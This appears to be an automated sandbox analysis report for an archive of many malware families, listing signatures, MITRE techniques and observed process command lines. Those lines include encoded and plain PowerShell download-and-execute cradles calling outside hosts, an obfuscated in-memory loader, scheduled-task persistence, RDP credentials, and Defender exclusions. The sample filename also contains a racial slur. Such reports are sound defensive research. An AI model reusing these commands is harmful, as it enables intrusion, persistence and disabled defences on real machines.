Malware Analysis Report

2025-01-23 12:20

Sample ID 241204-qme93awpgz
Target 241204-p9yjgs1nbp_pw_infected.zip
SHA256 74d74bfdd9852c7967a852d632c16dc347b358fead85c04b04a809d9a35fb2c9
Tags
pyinstaller ammyyadmin asyncrat lumma metasploit modiloader neshta njrat quasar ta505 xmrig xworm default office04 sgvp backdoor credential_access defense_evasion discovery evasion execution miner persistence privilege_escalation rat spyware stealer themida trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

74d74bfdd9852c7967a852d632c16dc347b358fead85c04b04a809d9a35fb2c9

Threat Level: Known bad

The file 241204-p9yjgs1nbp_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

pyinstaller ammyyadmin asyncrat lumma metasploit modiloader neshta njrat quasar ta505 xmrig xworm default office04 sgvp backdoor credential_access defense_evasion discovery evasion execution miner persistence privilege_escalation rat spyware stealer themida trojan upx vmprotect

Njrat family

Neshta

Neshta family

AsyncRat

Detect Xworm Payload

Ta505 family

Xworm family

XMRig Miner payload

AmmyyAdmin payload

Ammyyadmin family

Ammyy Admin

Xmrig family

Metasploit family

Xworm

TA505

Lumma Stealer, LummaC

Quasar family

njRAT/Bladabindi

Lumma family

ModiLoader, DBatLoader

Modiloader family

MetaSploit

Asyncrat family

Quasar RAT

Quasar payload

xmrig

Detect Neshta payload

Async RAT payload

ModiLoader Second Stage

Sets file to hidden

Indicator Removal: Network Share Connection Removal

Downloads MZ/PE file

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Creates new service(s)

Modifies Windows Firewall

Executes dropped EXE

VMProtect packed file

Loads dropped DLL

Themida packer

Checks computer location settings

Network Share Discovery

Looks up external IP address via web service

Power Settings

Legitimate hosting services abused for malware hosting/C2

UPX packed file

AutoIT Executable

Launches sc.exe

Detects Pyinstaller

Unsigned PE

Access Token Manipulation: Create Process with Token

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Embeds OpenSSL

Program crash

System Network Configuration Discovery: Internet Connection Discovery

NSIS installer

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Runs net.exe

Delays execution with timeout.exe

Runs ping.exe

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-04 13:22

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 13:22

Reported

2024-12-04 13:28

Platform

win10ltsc2021-20241023-en

Max time kernel

17s

Max time network

322s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

ModiLoader, DBatLoader

trojan modiloader

Modiloader family

modiloader

Neshta

persistence spyware neshta

Neshta family

neshta

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

TA505

ta505

Ta505 family

ta505

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Share Discovery

discovery

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\powershell.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 2452 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 220 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 220 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 220 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 220 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
PID 1432 wrote to memory of 4760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 4760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 220 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
PID 220 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
PID 220 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Noninteractive -windowstyle hidden -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUAOwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAALQBiAG8AcgAgADMAMAA3ADIAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcANgAuADEAMQAxAC4AMQA3ADQALgAxADMAOAAvAHUAcwBlAHIAcwB5AG4AYwAvAHQAcgBhAGQAZQBkAGUAcwBrAC8AXwByAHAAJwApACkAKQApAA==

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AV.scr

"C:\Users\Admin\Downloads\UrlHausFiles\AV.scr" /S

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe

"C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 100 -ip 100

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 1172

C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4960 -ip 4960

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1448

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Users\Admin\AppData\Local\Temp\is-9HKOQ.tmp\ClientServices.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9HKOQ.tmp\ClientServices.tmp" /SL5="$50056,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES

C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\timeout.exe

timeout /T 3

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-1FM0F.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1FM0F.tmp\stail.tmp" /SL5="$2036C,3299853,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause powerful_player_1242

C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe

"C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause powerful_player_1242

C:\Users\Admin\Downloads\UrlHausFiles\mi.exe

"C:\Users\Admin\Downloads\UrlHausFiles\mi.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2546.tmp\2547.tmp\2548.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2AA5.tmp\2AA6.tmp\2AA7.bat C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\sound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\sound.exe"

C:\Windows\system32\net.exe

net use /delete * /y

C:\Windows\system32\net.exe

net use D: \\210.216.165.152\super_share smbtest@@ /user:smbtest /persistent:yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe"

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

